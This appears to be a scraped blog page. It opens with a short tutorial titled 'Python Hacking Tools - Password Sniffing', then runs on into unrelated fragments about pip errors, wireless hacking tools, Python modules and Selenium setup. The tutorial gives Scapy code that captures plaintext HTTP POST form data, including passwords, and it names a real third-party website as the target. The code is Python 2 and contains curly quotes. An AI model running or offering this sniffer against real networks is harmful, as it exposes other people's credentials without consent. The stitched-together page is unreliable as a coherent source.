Python Hacking Tools - Password Sniffing

Password Sniffing with Scapy

1. Download and install the Scapy first.

pip install scapy

https://scapy.net/

2. Target Website

https://aavtrain.com/index.asp

3. Write the Python code

from scapy.all import *

def sniffer(packet):
    http_packet = packet
    if ‘POST‘ in str(http_packet):
        domain = str(http_packet).split("\r\n")[1].split(":")[1]
        data = str(http_packet).split("\r\n\r\n")[1]
        print "*" * 20
        print "Domain: " + domain
        print "Data: " + data
        print "*" * 20
        print "\n\n"

sniff(iface="eth0", prn=sniffer, filter="tcp port 80")

4. Execute the Python code and visit the target website through Firefox.

原文地址:https://www.cnblogs.com/keepmoving1113/p/11331179.html

时间: 2024-10-31 02:17:36

Python Hacking Tools - Password Sniffing的相关文章

Python packaging tools not found的问题解决

首先,我用的虚拟机装的linux系统,linux自带的python2.7,所以python的安装工具是python2的,当使用python3.6,也就是在在项目中设置python3.6的时候,系统自动调用的是python2的下载工具,所以就会有各种不明的no module出现. 这个时候的解决方法是,新增加安装python3命令窗口执行sudo apt install python3-pip 原文地址:http://blog.51cto.com/13831593/2346824

Top 10 Free Wireless Network hacking/monitoring tools for ethical hackers and businesses

There are lots of free tools available online to get easy access to the WiFi networks intended to help the network admins and the programmers working on the WiFi systems and we at Team Techworm have picked the top 10 of those for ethical hackers, pro

Machine and Deep Learning with Python

Machine and Deep Learning with Python Education Tutorials and courses Supervised learning superstitions cheat sheet Introduction to Deep Learning with Python How to implement a neural network How to build and run your first deep learning network Neur

13、Python入门

一 第一句python代码 1. 解释器:即时调试代码,代码无法永久保存 2. 文件:永久保存代码 在D:\python_test\目录下新建文件hello.py,编写代码如下 print('hello world') 执行hello.py,即python D:\python_test\hello.py python内部执行过程如下: 上一步中执行python D:\python_test\hello.py时,明确的指出 hello.py 脚本由 python 解释器来执行. 在linux平台中

《用Python写网络爬虫》示例网站搭建(框架+本书pdf+章节代码)

所用到的代码及工具 示例网站源码+框架+本书pdf+章节代码 链接: https://pan.baidu.com/s/1miHjIYk 密码: af35 环境 python2.7 win7x64 示例网站搭建 wswp-places.zip 书中站点源码web2py_src.zip 站点所使用的框架 1 解压web2py_src.zip2 然后到web2py/applications目录下 3 将wswp-places.zip解压到applications目录下 4 返回上一层目录,到web2p

【Python】初学编程适合学Python?其有何用?

初学编程适合学Python?其有何用? 作者:白宁超 2016年10月4日19:59:39 摘要:python语言俨然不算新技术,七八年前甚至更早已有很多人研习,只是没有现在流行罢了.之所以当下如此盛行,我想肯定是多因素造成了,当然市场需求的重要因素.吴军博士对大数据流行的解释与python流行或许有些默契.数据一直以来都存在,只是在历史条件下,由于计算性能和技术发展的原因,与之匹配的数据处理技术还不是很先进,以至于很多数据被我们舍弃了.同样,python语言简洁流畅等多种优点,也会让第一次接触

Python 模块学习

模块学习: http://wsyht90.blog.51cto.com/9014030/1845737 1.getpass 2.os 3.sys 4.subprocess 5.hashlib 6.json 7.pickle 8.shutil 9.time 10.datetime 11.re 12.random 13.configparser 14.traceback 15.yaml 16.itertools 17.logging 18.urllib.urllib2 19.paramiko ###

Selenium2+python自动化58-读取Excel数据(xlrd)

前言 当登录的账号有多个的时候,我们一般用excel存放测试数据,本节课介绍,python读取excel方法,并保存为字典格式. 一.环境准备 1.先安装xlrd模块,打开cmd,输入pip install xlrd在线安装 >>pip install xlrd 二.基本操作 1.exlce基本操作方法如下 # 打开exlce表格,参数是文件路径data = xlrd.open_workbook('test.xlsx') # table = data.sheets()[0]          

ubuntu 上配置python +selenium环境

1.ubuntu 自带了python, 可以打开终端输入python 回车后如果显示版本信息就说明已经安装 2.安装安装python setup tools apt-get install python-setuptools 3.安装pip 管理工具 sudo aot-get install pip 4.安装完成后 在安装selenium sudo pip install selenium 网速很不稳定经常报错, 多试几次就可以了. 5.最后安装geckodrive firefox 版本: ht